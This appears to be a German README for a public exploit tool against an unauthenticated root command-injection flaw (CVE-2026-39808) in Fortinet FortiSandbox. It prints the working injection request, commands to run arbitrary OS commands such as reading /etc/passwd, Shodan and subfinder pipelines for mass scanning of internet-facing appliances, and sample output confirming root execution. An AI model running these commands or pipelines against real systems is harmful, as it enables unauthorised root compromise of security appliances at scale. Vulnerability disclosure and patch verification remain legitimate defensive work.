
Nicht authentifizierter RCE-Scanner für FortiSandbox CVE-2026-39808 mit Canary-basierter Verifizierung, Befehlsausführung und Pipeline-Integration für Massen-Scans.
Nicht authentifizierte OS-Befehlsinjektion als root in Fortinet FortiSandbox
Schwachstelle • Installation • Verwendung • Funktionsweise • Pipeline • Shodan-Dorks • Haftungsausschluss
CVE-2026-39808 ist eine kritische, nicht authentifizierte OS-Befehlsinjektions-Schwachstelle in Fortinet FortiSandbox. Der API-Endpunkt /fortisandbox/job-detail/tracer-behavior bereinigt den Parameter jid nicht ausreichend, sodass ein Angreifer beliebige OS-Befehle injizieren kann, die als root ausgeführt werden — ohne jegliche Authentifizierung.
| Detail | Wert |
|---|---|
| CVE-ID | CVE-2026-39808 |
| CVSS-Score | 9.8 (Kritisch) |
| Angriffsvektor | Netzwerk |
| Authentifizierung | Keine |
| Berechtigungen | Root |
| Betroffene Versionen | FortiSandbox < 4.4.9 |
| Behoben in | 4.4.9 und höher |
| Advisory | FG-IR-25-325 |
Der Parameter jid im tracer-behavior-Endpunkt wird ohne Bereinigung direkt an einen Systembefehl übergeben. Mithilfe von Pipe-Zeichen (|) kann ein Angreifer aus dem vorgesehenen Befehlskontext ausbrechen und beliebige Befehle ausführen:
GET /fortisandbox/job-detail/tracer-behavior?jid=|(id > /web/ng/out.txt)| HTTP/1.1
Die Ausgabe wird in /web/ng/out.txt geschrieben, das auf dem Webserver unter /ng/out.txt erreichbar ist — ein praktischer Rücklesemechanismus für blinde Befehlsinjektion.
Keine Abhängigkeiten. Nur Python-3.7+-Standardbibliothek.
git clone https://github.com/ynsmroztas/FortiSandbox-RCE-Exploit-CVE-2026-39808
cd FortiSandbox-RCE-Exploit-CVE-2026-39808
chmod +x fortisandbox_rce.py
# Prüfen, ob ein Ziel verwundbar ist (verwendet Canary-basierte Erkennung)
python3 fortisandbox_rce.py -u https://fortisandbox.target.com
# Einen bestimmten Befehl auf dem Ziel ausführen
python3 fortisandbox_rce.py -u https://target.com --cmd "id"
python3 fortisandbox_rce.py -u https://target.com --cmd "cat /etc/passwd"
python3 fortisandbox_rce.py -u https://target.com --cmd "uname -a"
# Nur prüfen, ob verwundbar, --cmd nicht ausführen
python3 fortisandbox_rce.py -u https://target.com --verify-only
python3 fortisandbox_rce.py -u https://target.com --cmd "id" --proxy http://127.0.0.1:8080
python3 fortisandbox_rce.py -u https://target.com -o report.json
# Aus einer URL-Liste
cat targets.txt | python3 fortisandbox_rce.py --stdin --verify-only -o report.json
# subfinder → httpx → Scanner
subfinder -d target.com -silent | httpx -silent | python3 fortisandbox_rce.py --stdin
# Shodan → Scanner
shodan search 'title:"FortiSandbox"' --fields ip_str,port --separator : | \
sed 's/^/https:\/\//' | httpx -silent | \
python3 fortisandbox_rce.py --stdin --verify-only -o results.json
usage: fortisandbox_rce.py [-h] [-u URL] [--stdin] [--cmd CMD] [--verify-only]
[--proxy PROXY] [--timeout TIMEOUT]
[--rate-limit RATE_LIMIT] [-o OUTPUT] [--no-banner]
Options:
-u, --url URL Ziel-URL
--stdin URLs von stdin lesen (Pipeline-Modus)
--cmd CMD Auszuführender OS-Befehl (Standard: id)
--verify-only Nur Schwachstelle verifizieren, --cmd nicht ausführen
--proxy PROXY HTTP-Proxy (z. B. http://127.0.0.1:8080)
--timeout TIMEOUT HTTP-Timeout in Sekunden (Standard: 15)
--rate-limit RATE_LIMIT Verzögerung zwischen Zielen in ms (Standard: 0)
-o, --output FILE JSON-Berichtsdatei ausgeben
--no-banner Banner unterdrücken
Der Scanner verwendet einen 5-stufigen Verifizierungsprozess mit strenger Vermeidung von Fehlalarmen:
Schritt 1 → FortiSandbox erkennen (Titel/Header-Fingerprint)
Schritt 2 → Prüfen, ob der verwundbare Endpunkt existiert
Schritt 3 → Eindeutige Canary-Zeichenkette per Befehlsinjektion injizieren
Schritt 4 → /ng/out.txt lesen und Canary verifizieren (strikte Klartext-Validierung)
Schritt 5 → Benutzerbefehl ausführen + Bereinigung
Der Scanner implementiert mehrere Validierungsebenen, um Fehlalarme zu eliminieren:
text/html seinid-Ausgabe-Regex — Strikte uid=\d+(\w+)-Mustererkennung mit Größenprüfung (<1000 Bytes)/ng-Suffix, um Doppelpfad-Probleme zu vermeiden ╔══════════════════════════════════════════════════════════╗
║ FortiSandbox RCE Scanner v1.0 — CVE-2026-39808 ║
║ Unauthenticated Command Injection (root) ║
╚══════════════════════════════════════════════════════════╝
mitsec | @ynsmroztas
┌──────────────────────────────────────────────────────────┐
│ Target: https://fortisandbox.example.com │
└──────────────────────────────────────────────────────────┘
✓ FortiSandbox detected!
▸ Checking endpoint: /fortisandbox/job-detail/tracer-behavior
▸ Endpoint status: 200 | Content-Type: text/html
▸ Injecting canary: mitsec_a8k3m2x1
▸ Reading output: https://fortisandbox.example.com/ng/out.txt
CRITICAL 🔥 VULNERABLE — CVE-2026-39808 CONFIRMED!
CRITICAL Target: https://fortisandbox.example.com
✓ Canary 'mitsec_a8k3m2x1' verified in output (clean plain text)
──────────────────────────────────────────────────────────
Command Output: id
──────────────────────────────────────────────────────────
│ uid=0(root) gid=0(root) groups=0(root)
──────────────────────────────────────────────────────────
✓ Output file cleaned up
┌──────────────────────────────────────────────────────────┐
│ Target: https://patched.example.com │
└──────────────────────────────────────────────────────────┘
✓ FortiSandbox detected!
▸ Checking endpoint: /fortisandbox/job-detail/tracer-behavior
✗ Endpoint returned 404 — not vulnerable or patched